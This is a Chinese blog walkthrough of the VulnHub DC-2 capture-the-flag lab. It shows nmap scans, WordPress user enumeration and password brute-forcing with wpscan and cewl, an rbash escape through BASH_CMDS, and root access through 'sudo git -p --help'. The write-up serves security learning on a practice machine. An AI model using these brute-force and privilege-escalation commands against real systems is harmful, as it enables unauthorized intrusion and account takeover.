vulnhub--DC2

2023-11-03 08:10
文章标签 vulnhub dc2

本文主要是介绍vulnhub--DC2,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

环境:kali、DC2靶机

DC2靶机默认桥接模式,开启前改成net模式,保证kali和DC2在同一局域网中。(也可都是桥接模式,我比较习惯net模式)

ifconfig查看kaliIP地址:192.168.44.131

2b840a57bb534485aa1d91746bd97db9.png

查看C段,准备C段扫描,在虚拟机编辑--虚拟网络编辑器中,

b711d58d60ec4efeb4a8cc89d2975258.png

得知网段192.168.44.0/24,使用nmap扫描存活主机

nmap -sP 192.168.44.0/24    #扫描IP段的所有IP地址

38c8f08ba6da4753bd8450572c7ba329.png

 一般都会扫描出5个存活主机,出去较大的,较小的,得知DC2的IP为192.168.44.142(或者还有一种方法判断192.168.44.142就是DC2主机IP,就是把DC2关机扫描一次,开机扫描一次)

端口扫描,

nmap -A -p1-65535 -T4 192.168.44.142     #扫描开放端口及对应服务

7229fe5a699a488ab43930c6f03ba6a6.png

 开放了80和7744端口,分别对应http服务和ssh服务。

既然开放80端口,直接访问http服务。直接在地址栏输入IP地址即可,

输入访问ip,发现无法访问返回到dc-2路径,需要修改/etc/host文件

6ff063e84b784168a69077f22bf5ea6d.png

 进入/etc目录,vim打开hosts文件,添加 192.168.44.142   dc-2.保存退出

33a302ccbb72492ab5aff7d9783739bd.png

 2071d8681ccb45599ee244ad1d163131.png

再次访问web服务,即可成功访问,并且看到cms是wordpress(WordPress是一种使用PHP语言和MySQL数据库开发的博客平台

4bbb91f76a544de99e49e5c866956407.png

 点击flag,出现提示

3fabc8bc1a2a443381928a8c90ee123e.png

 

看不懂,翻译

2bba8ce8e483424494522a92ffd0d841.png

 提示用cewl工具破解密码,登陆后才可以查看下一个flag

(Cewl是一款采用Ruby开发的应用程序,可以给它的爬虫指定URL地址和爬取深度,还可以添额外的外部链接,接下来Cewl会给你返回一个字典文件,然后可以用于密码破解。)

既然需要登录,使用dirb扫描网站目录,寻找可登录网站

c8484ff6cd804fd28f30a13094761650.png

看到wp-admin,访问

538e5835df2c415f98a1aabf9571d01a.png 

成功访问,看到登录界面,前面又提示需要cwel(cwel生成的字典是用来爆破密码的),尝试用户枚举,然后利用枚举到的用户爆破密码

wpscan --url http://dc-2/wp-admin/ -e u

f327aa1c0e4446e4afb80c0e9117a871.png

 

5063d1a63ce546d090b9ccf7a22d949f.png

wpscan --url http://dc-2/wp-admin/ -e u这个命令可以爆出3个用户名,

  1. admin

  2. tom

  3. jerry

(如果wpscan运行时报错,

Unable to get https://data.wpscan.org/metadata.json.sha512 ......等等报错,大概意思呢就是访问不到这个更新源;网上很多教程,大概意思就是下载最新压缩包,放到本地更新。我是直接换了一个kali源,既然找不到更新源,就换掉用其他的。kali源网上很多,我换了阿里云的就能正常更新了。)

接着使用cewl生成与url相关的密码,

vim user.txt   #先把用户名放到一个txt中cewl http://dc-2/ -w passwd.txt     #生成字典

3b6ca5c3965b48c4a10d09d0ddbb833b.png

 用wpscan进行爆破密码。需要两个文件,一个user.txt–内容就是3个用户名。一个是cewl生成的字典文件passwd.txt。

wpscan --url http://dc-2 -U user.txt -P passwd.txt  #爆破密码

651fb45099ec417da035f2594470659b.png

这里只爆破出两个,admin没有爆出。

 5d9abd8ac3e945aeb7e69b5eddb6cdb5.png

 用户名密码都拿到手,登录后台,

3ae21cc2a7b2434485d57b45db5c5140.png

 成功进入,随便点点,

8c5016f80dc24a1ebaf9f2204573f277.png

 这里看到flag2,提示出现,还是看不懂,

4451b121c68145dd9ff9a37fe4a20d46.png

 百度翻译

09a1c92bcaf6477d9bb405b6be6001b8.png

 提示说如果不能利用wordpress,也就是80端口,web服务,还有另外一种方法,前面端口扫描时,扫出来了两个服务,另一个是7744端口,ssh服务。尝试连接吧

ssh tom@192.168.44,142 -p 7744 

ec0b68be166f4078a06939a76312b055.png

jerry不能登录,但是tom登录上了,ls一下,直接看到flag3.txt,想都不用想,直接cat,结果,它早有预防,tom登录后rbash限制,各种命令执行不通,但是vi可以用,

3d7412d43db24b2eb137ad28325df8d0.png

但是vi可以用,

 174b57c307fb4d90a352612e103e22f3.png

 继续百度翻译

78d6a16d44244ae09db20b57485d3a0d.png

 什么意思,百度说是要切换用户的意思,

fb9c7a26d212415994d108aa17b93ef7.png

 rbash是Restricted Shell,即受限的shell,它与一般标准shell的区别在于会限制执行一些行为。
怎么做可以绕过shell限制?

tom@DC-2:~$ su jerry
-rbash: su: command not found
tom@DC-2:~$ BASH_CMDS[a]=/bin/sh;a
$ /bin/bash
tom@DC-2:~$ export PATH=$PATH:/bin/
tom@DC-2:~$ export PATH=$PATH:/usr/bin
tom@DC-2:~$ su jerry
Password: 
jerry@DC-2:/home/tom$ 

 什么意思,我不知道,反正是切换成功了,不知道的交给百度吧

 切换用户后,在jerry的家目录看到flag4.txt

48345c96bff84939aec9c9b855d966f2.png

88e5202ddcec4d4293c2e11558c37a10.png

 终于,剩最后一个了,

flag4提示可以用git,使用git提权,sudo -l看到不需要root权限。

2d3a78d3658243269978820dd0fa4b99.png 

利用SUID进行提权,SUID可以让调用者以文件拥有者的身份运行该文件

已知可用来提权的linux文件: Nmap Vim find Bash More Less Nano

查找系统上运行的所有SUID可执行文件

find / -user root -perm -4000 -print 2>/dev/nullfind / -perm -u=s -type f 2>/dev/nullfind / -user root -perm -4000 -exec ls -ldb {} \;
(可不输这几条)
输入sudo git -p –help

a667e5ebc403493b88d2f18f690c364d.png

 

 输入!/bin/bash 获得root权限,在roo目录下找到最终flag。

658fcde4284746b886e6ff93d922a471.png

 

 

这篇关于vulnhub--DC2的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/336802

相关文章

Vulnhub靶场 | DC系列 - DC9

文章目录 DC-9环境搭建渗透测试端口敲门服务 DC-9 环境搭建 靶机镜像下载地址:https://vulnhub.com/entry/dc-6,315/需要将靶机和 kali 攻击机放在同一个局域网里;本实验kali 的 IP 地址:192.168.10.146。 渗透测试 使用 nmap 扫描 192.168.10.0/24 网段存活主机 ┌──(root💀k

vulnhub靶场-DC2

一、环境配置 1.下载地址:https://www.vulnhub.com/entry/dc-2,311/ 2.靶场配置:Nat模式   更改hosts文件,官网提示需要更改hosts文件才能访问到网站,否则访问不了 kali进入编辑模式vim,添加上自己的靶机ip地址保存即可 vim /etc/hosts 3.攻击机:kali ip:192.168.111.12

Vulnhub靶场 | DC系列 - DC8

文章目录 DC-8环境搭建渗透测试 DC-8 环境搭建 靶机镜像下载地址:https://vulnhub.com/entry/dc-6,315/需要将靶机和 kali 攻击机放在同一个局域网里;本实验kali 的 IP 地址:192.168.10.146。 渗透测试 使用 nmap 扫描 192.168.10.0/24 网段存活主机 ┌──(root💀kali)-[~/

Vulnhub靶场 | DC系列 - DC7

文章目录 DC-7环境搭建渗透测试 DC-7 环境搭建 靶机镜像下载地址:https://vulnhub.com/entry/dc-6,315/需要将靶机和 kali 攻击机放在同一个局域网里;本实验kali 的 IP 地址:192.168.10.146。 渗透测试 使用 nmap 扫描 192.168.10.0/24 网段存活主机 ┌──(root💀kali)-[~/

Vulnhub靶场 | DC系列 - DC4

文章目录 DC-4环境搭建渗透测试 DC-4 环境搭建 靶机镜像下载地址:https://vulnhub.com/entry/dc-4,313/需要将靶机和 kali 攻击机放在同一个局域网里;本实验kali 的 IP 地址:192.168.10.146。 渗透测试 使用 nmap 扫描 192.168.10.0/24 网段存活主机 ┌──(root💀kali)-[~/

Vulnhub靶场 | DC系列 - DC-3

文章目录 DC-3环境搭建渗透测试 DC-3 环境搭建 靶机镜像下载地址:https://vulnhub.com/entry/dc-32,312/需要将靶机和 kali 攻击机放在同一个局域网里;本实验kali 的 IP 地址:192.168.10.146。 渗透测试 使用 nmap 扫描 192.168.10.0/24 网段存活主机 ┌──(root💀kali)-[~

Vulnhub--OS-HACKNOS-2.1

渗透复现 目标站点为wordpress,通过wpscan进行漏洞扫描发现漏洞插件 通过漏洞插件存在的目录穿越漏洞成功读取/etc/passwd文件中flag用户的密码 SSH登录flag用户后在备份文件中找到rohit用户的密码 切换rohit用户,rohit用户能够以root权限执行任何文件,随后进行sudo su提权 知识扩展 wpsacn扫描wordpress站点 以root权

[Vulnhub] Sleepy JDWP+Tomcat+Reverse+Reverse-enginnering

信息收集 Server IP AddressPorts Opening192.168.8.100TCP:21,8009,9001 $ nmap -sV -sC 192.168.8.100 -p- --min-rate 1000 -Pn Starting Nmap 7.92 ( https://nmap.org ) at 2024-06-20 05:06 EDTNmap scan repor

[Vulnhub] BrainPan BOF缓冲区溢出+Man权限提升

信息收集 Server IP AddressPorts Open192.168.8.105TCP: $ nmap -p- 192.168.8.105 -sC -sV -Pn --min-rate 1000 Starting Nmap 7.92 ( https://nmap.org ) at 2024-06-10 04:20 EDTNmap scan report for 192.168.8

vulnhub靶机hacksudoLPE中Challenge-1

下载地址:https://download.vulnhub.com/hacksudo/hacksudoLPE.zip 主机发现 目标146 端口扫描 服务扫描 漏洞扫描 上面那整出来几个洞,可以试试 easy? 估计就是看源码 看来是的 登入咯 这里进不去就是ssh咯 这个看着有点像提权的操作 一、Challenge-1 1.